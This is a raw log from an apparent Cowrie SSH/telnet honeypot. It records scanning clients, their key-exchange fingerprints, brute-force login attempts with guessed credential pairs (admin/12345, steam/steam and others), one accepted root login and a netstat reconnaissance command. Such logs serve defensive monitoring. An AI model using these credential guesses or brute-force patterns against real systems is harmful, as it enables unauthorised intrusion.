{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:04:47.829424Z","src_ip":"171.243.151.203","session":"9bf0bece6b62"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T01:04:50.924567Z","src_ip":"171.243.151.203","session":"9bf0bece6b62"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":34512,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fb4caf370ee","protocol":"ssh","message":"New connection: 171.243.150.245:34512 (1.2.3.4:22) [session: 7fb4caf370ee]","sensor":"my-vps","timestamp":"2025-08-28T01:04:51.198331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:04:51.225832Z","src_ip":"171.243.150.245","session":"7fb4caf370ee"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:04:51.429707Z","src_ip":"171.243.150.245","session":"7fb4caf370ee"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-28T01:04:54.969129Z","src_ip":"171.243.150.245","session":"7fb4caf370ee"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:04:56.069251Z","src_ip":"171.243.151.203","session":"9bf0bece6b62"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:04:56.178095Z","src_ip":"171.243.150.245","session":"7fb4caf370ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34512,"dst_ip":"1.2.3.4","dst_port":22,"session":"478680c007b7","protocol":"ssh","message":"New connection: 212.227.125.160:34512 (1.2.3.4:22) [session: 478680c007b7]","sensor":"my-vps","timestamp":"2025-08-28T01:05:08.769011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:05:08.789559Z","src_ip":"212.227.125.160","session":"478680c007b7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:05:09.122756Z","src_ip":"212.227.125.160","session":"478680c007b7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T01:05:10.194247Z","src_ip":"212.227.125.160","session":"478680c007b7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:05:11.502935Z","src_ip":"212.227.125.160","session":"478680c007b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55503,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3b7c07990aa","protocol":"ssh","message":"New connection: 212.227.235.229:55503 (1.2.3.4:22) [session: c3b7c07990aa]","sensor":"my-vps","timestamp":"2025-08-28T01:05:19.759863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:05:19.760834Z","src_ip":"212.227.235.229","session":"c3b7c07990aa"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:05:19.864993Z","src_ip":"212.227.235.229","session":"c3b7c07990aa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"craft","message":"login attempt [admin/craft] failed","sensor":"my-vps","timestamp":"2025-08-28T01:05:20.367236Z","src_ip":"212.227.235.229","session":"c3b7c07990aa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"corgan","message":"login attempt [admin/corgan] failed","sensor":"my-vps","timestamp":"2025-08-28T01:05:21.473971Z","src_ip":"212.227.235.229","session":"c3b7c07990aa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cooker","message":"login attempt [admin/cooker] failed","sensor":"my-vps","timestamp":"2025-08-28T01:05:22.580977Z","src_ip":"212.227.235.229","session":"c3b7c07990aa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"computers","message":"login attempt [admin/computers] failed","sensor":"my-vps","timestamp":"2025-08-28T01:05:23.688119Z","src_ip":"212.227.235.229","session":"c3b7c07990aa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"citibank","message":"login attempt [admin/citibank] failed","sensor":"my-vps","timestamp":"2025-08-28T01:05:24.795728Z","src_ip":"212.227.235.229","session":"c3b7c07990aa"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:05:25.902132Z","src_ip":"212.227.235.229","session":"c3b7c07990aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26919,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb3ad2cf8c75","protocol":"ssh","message":"New connection: 212.227.235.229:26919 (1.2.3.4:22) [session: cb3ad2cf8c75]","sensor":"my-vps","timestamp":"2025-08-28T01:05:29.133910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:05:29.234232Z","src_ip":"212.227.235.229","session":"cb3ad2cf8c75"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:05:29.497903Z","src_ip":"212.227.235.229","session":"cb3ad2cf8c75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44139,"dst_ip":"1.2.3.4","dst_port":23,"session":"048ad1e0730e","protocol":"telnet","message":"New connection: 212.227.235.229:44139 (1.2.3.4:23) [session: 048ad1e0730e]","sensor":"my-vps","timestamp":"2025-08-28T01:05:29.646389Z"}
{"eventid":"cowrie.login.success","username":"root","password":"06Ax29160","message":"login attempt [root/06Ax29160] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:05:31.543143Z","src_ip":"212.227.235.229","session":"cb3ad2cf8c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:05:34.214470Z","src_ip":"212.227.235.229","session":"cb3ad2cf8c75"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-28T01:05:34.215335Z","src_ip":"212.227.235.229","session":"cb3ad2cf8c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:05:34.572487Z","src_ip":"212.227.235.229","session":"cb3ad2cf8c75"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:05:34.631479Z","src_ip":"212.227.235.229","session":"cb3ad2cf8c75"}
{"eventid":"cowrie.session.closed","duration":12.958161354064941,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:05:42.604477Z","src_ip":"212.227.235.229","session":"048ad1e0730e"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":55242,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a81212a2c97","protocol":"ssh","message":"New connection: 171.243.150.245:55242 (1.2.3.4:22) [session: 0a81212a2c97]","sensor":"my-vps","timestamp":"2025-08-28T01:05:46.401505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:05:46.476554Z","src_ip":"171.243.150.245","session":"0a81212a2c97"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":58202,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ab718a23ccd","protocol":"ssh","message":"New connection: 194.233.79.134:58202 (1.2.3.4:22) [session: 3ab718a23ccd]","sensor":"my-vps","timestamp":"2025-08-28T01:05:54.757181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:05:55.462571Z","src_ip":"194.233.79.134","session":"3ab718a23ccd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:05:55.463264Z","src_ip":"194.233.79.134","session":"3ab718a23ccd"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T01:05:56.823409Z","src_ip":"194.233.79.134","session":"3ab718a23ccd"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:05:58.104309Z","src_ip":"194.233.79.134","session":"3ab718a23ccd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:06:08.300767Z","src_ip":"171.243.150.245","session":"0a81212a2c97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47978,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cf50e63df8b","protocol":"ssh","message":"New connection: 212.227.125.160:47978 (1.2.3.4:22) [session: 2cf50e63df8b]","sensor":"my-vps","timestamp":"2025-08-28T01:06:09.434269Z"}
